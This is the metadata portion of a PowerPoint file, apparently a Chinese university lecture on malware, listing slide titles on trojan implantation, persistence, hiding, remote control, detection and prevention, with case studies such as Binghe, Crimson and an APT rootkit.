      <vt:lpstr>（1）网页浏览植入</vt:lpstr>
      <vt:lpstr>（2）水坑攻击</vt:lpstr>
      <vt:lpstr>（2）水坑攻击</vt:lpstr>
      <vt:lpstr>（3）利用电子邮件植入</vt:lpstr>
      <vt:lpstr>（3）利用电子邮件植入</vt:lpstr>
      <vt:lpstr>例一</vt:lpstr>
      <vt:lpstr>例二</vt:lpstr>
      <vt:lpstr>例三</vt:lpstr>
      <vt:lpstr>利用电子邮件植入</vt:lpstr>
      <vt:lpstr>（4）网络下载植入</vt:lpstr>
      <vt:lpstr>（5）利用即时通工具植入</vt:lpstr>
      <vt:lpstr>（6）与其它程序或文档捆绑</vt:lpstr>
      <vt:lpstr>例：图片木马</vt:lpstr>
      <vt:lpstr>（7）利用移动存储设备植入</vt:lpstr>
      <vt:lpstr>“摆渡”木马</vt:lpstr>
      <vt:lpstr>（8）社会工程学</vt:lpstr>
      <vt:lpstr>（8）社会工程学</vt:lpstr>
      <vt:lpstr>（8）社会工程学</vt:lpstr>
      <vt:lpstr>（8）社会工程学</vt:lpstr>
      <vt:lpstr>（8）社会工程学</vt:lpstr>
      <vt:lpstr>社会工程学</vt:lpstr>
      <vt:lpstr>（8）社会工程学</vt:lpstr>
      <vt:lpstr>通过云应用投放恶意代码</vt:lpstr>
      <vt:lpstr>远程控制木马的运行步骤</vt:lpstr>
      <vt:lpstr>自动加载技术</vt:lpstr>
      <vt:lpstr>自动加载技术</vt:lpstr>
      <vt:lpstr>(1) 修改系统文件</vt:lpstr>
      <vt:lpstr>(2) 修改系统注册表</vt:lpstr>
      <vt:lpstr>(2) 修改系统注册表</vt:lpstr>
      <vt:lpstr>(2) 修改系统注册表</vt:lpstr>
      <vt:lpstr>(3) 添加系统服务</vt:lpstr>
      <vt:lpstr>(4) 修改文件打开关联属性</vt:lpstr>
      <vt:lpstr>例：冰河的自动加载方法</vt:lpstr>
      <vt:lpstr>修改文件打开关联</vt:lpstr>
      <vt:lpstr>(5)　修改任务计划</vt:lpstr>
      <vt:lpstr>(6)　修改组策略</vt:lpstr>
      <vt:lpstr>（6）修改组策略（续）</vt:lpstr>
      <vt:lpstr>(7)　修改启动文件夹</vt:lpstr>
      <vt:lpstr>(8) 利用系统自动运行的程序</vt:lpstr>
      <vt:lpstr>(9) 替换系统DLL</vt:lpstr>
      <vt:lpstr>（10）其它</vt:lpstr>
      <vt:lpstr>远程控制木马的运行步骤</vt:lpstr>
      <vt:lpstr>建立连接</vt:lpstr>
      <vt:lpstr>建立连接</vt:lpstr>
      <vt:lpstr>远程控制木马的反弹技术</vt:lpstr>
      <vt:lpstr>远程控制木马的运行步骤</vt:lpstr>
      <vt:lpstr>远程控制技术</vt:lpstr>
      <vt:lpstr>(1) 获取目标机器信息</vt:lpstr>
      <vt:lpstr>(2) 记录用户事件</vt:lpstr>
      <vt:lpstr>(3) 远程操作</vt:lpstr>
      <vt:lpstr>内容提纲</vt:lpstr>
      <vt:lpstr>木马的隐藏技术</vt:lpstr>
      <vt:lpstr>1、启动隐藏</vt:lpstr>
      <vt:lpstr>文件类型图标诱骗</vt:lpstr>
      <vt:lpstr>文件类型图标诱骗</vt:lpstr>
      <vt:lpstr>文件类型图标诱骗</vt:lpstr>
      <vt:lpstr>2、木马文件/目标隐藏</vt:lpstr>
      <vt:lpstr>3、进程隐藏</vt:lpstr>
      <vt:lpstr>3、进程隐藏</vt:lpstr>
      <vt:lpstr>（1）设置窗口不可见</vt:lpstr>
      <vt:lpstr>（2）把木马程序注册为服务</vt:lpstr>
      <vt:lpstr>（3）欺骗查看进程的函数</vt:lpstr>
      <vt:lpstr>（4）替换系统驱动或系统DLL</vt:lpstr>
      <vt:lpstr>（4）替换系统驱动或系统DLL</vt:lpstr>
      <vt:lpstr>（4）替换系统驱动或系统DLL</vt:lpstr>
      <vt:lpstr>（4）替换系统驱动或系统DLL</vt:lpstr>
      <vt:lpstr>（4）替换系统驱动或系统DLL</vt:lpstr>
      <vt:lpstr>（5）动态嵌入技术</vt:lpstr>
      <vt:lpstr>（6）进程隐藏小结</vt:lpstr>
      <vt:lpstr>4、通信隐藏</vt:lpstr>
      <vt:lpstr>4、通信隐藏</vt:lpstr>
      <vt:lpstr>4、通信隐藏：非端口</vt:lpstr>
      <vt:lpstr>4、通信隐藏</vt:lpstr>
      <vt:lpstr>案例：灰鸽子</vt:lpstr>
      <vt:lpstr>木马技术小结</vt:lpstr>
      <vt:lpstr>内容提纲</vt:lpstr>
      <vt:lpstr>恶意代码检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：特征检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：特征检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：特征检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：特征检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：特征检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：特征检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：特征检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：动态检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：动态检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：动态检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：动态检测</vt:lpstr>
      <vt:lpstr>恶意代码检测：机器学习方法</vt:lpstr>
      <vt:lpstr>恶意代码检测：机器学习方法</vt:lpstr>
      <vt:lpstr>恶意代码检测：机器学习方法</vt:lpstr>
      <vt:lpstr>恶意代码检测：机器学习方法</vt:lpstr>
      <vt:lpstr>恶意代码检测：机器学习方法</vt:lpstr>
      <vt:lpstr>恶意代码防范</vt:lpstr>
      <vt:lpstr>恶意代码防范</vt:lpstr>
      <vt:lpstr>恶意代码防范</vt:lpstr>
      <vt:lpstr> 本章小结</vt:lpstr>
      <vt:lpstr>讨论</vt:lpstr>
      <vt:lpstr>作业</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>一、木马实例（冰河）</vt:lpstr>
      <vt:lpstr>冰河</vt:lpstr>
      <vt:lpstr>冰河客户端界面 </vt:lpstr>
      <vt:lpstr>冰河的主要功能</vt:lpstr>
      <vt:lpstr>冰河的使用—连接服务器</vt:lpstr>
      <vt:lpstr>冰河的使用—连接成功后的信息</vt:lpstr>
      <vt:lpstr>冰河的使用—搜索服务器</vt:lpstr>
      <vt:lpstr>搜索服务器</vt:lpstr>
      <vt:lpstr>搜索到10.0.13.19</vt:lpstr>
      <vt:lpstr>冰河的使用(续)</vt:lpstr>
      <vt:lpstr>文件管理器</vt:lpstr>
      <vt:lpstr>文件管理器—下载文件</vt:lpstr>
      <vt:lpstr>冰河的使用(续)</vt:lpstr>
      <vt:lpstr>冰河的命令控制台 </vt:lpstr>
      <vt:lpstr>获得系统信息和口令</vt:lpstr>
      <vt:lpstr>捕获对方屏幕</vt:lpstr>
      <vt:lpstr>向对方发送信息</vt:lpstr>
      <vt:lpstr>管理对方的进程</vt:lpstr>
      <vt:lpstr>控制对方系统</vt:lpstr>
      <vt:lpstr>注册表管理</vt:lpstr>
      <vt:lpstr>甚至可以对桌面等其它信息设置</vt:lpstr>
      <vt:lpstr>冰河的使用(总结)</vt:lpstr>
      <vt:lpstr>二、木马实例（ Crimson ）</vt:lpstr>
      <vt:lpstr>拓展</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>Crimson分析</vt:lpstr>
      <vt:lpstr>远程控制过程中的几个名词</vt:lpstr>
      <vt:lpstr>三、一个APT木马技术分析</vt:lpstr>
      <vt:lpstr>实例分析</vt:lpstr>
      <vt:lpstr>实例分析</vt:lpstr>
      <vt:lpstr>1. rmgr.ko</vt:lpstr>
      <vt:lpstr>1. rmgr.ko</vt:lpstr>
      <vt:lpstr>1. rmgr.ko</vt:lpstr>
      <vt:lpstr> 1. rmgr.ko</vt:lpstr>
      <vt:lpstr> 1. rmgr.ko</vt:lpstr>
      <vt:lpstr> 1. rmgr.ko</vt:lpstr>
      <vt:lpstr> 1. rmgr.ko</vt:lpstr>
      <vt:lpstr>2. rmgr__fake_libc.so</vt:lpstr>
      <vt:lpstr> 2. rmgr__fake_libc.so</vt:lpstr>
      <vt:lpstr> 2. rmgr__fake_libc.so</vt:lpstr>
      <vt:lpstr> 2. rmgr__fake_libc.so</vt:lpstr>
      <vt:lpstr>3. rmgr_daemon</vt:lpstr>
      <vt:lpstr>3. rmgr_daemon</vt:lpstr>
      <vt:lpstr>3. rmgr_daemon</vt:lpstr>
      <vt:lpstr>3. rmgr_daemon</vt:lpstr>
      <vt:lpstr>3. rmgr_daemon</vt:lpstr>
      <vt:lpstr>4. rmgr_fake_sshd</vt:lpstr>
      <vt:lpstr>4. rmgr_fake_sshd</vt:lpstr>
      <vt:lpstr>实例隐蔽技术小结</vt:lpstr>
      <vt:lpstr>四、“雏莺行动”分析</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</vt:lpstr>
      <vt:lpstr>雏莺行动</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unknown</dc:creator>
  <cp:lastModifiedBy>wlf</cp:lastModifiedBy>
  <cp:revision>1462</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2004-07-10T13:16:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-28T08:12:38Z</dcterms:modified>
</cp:coreProperties>
</file>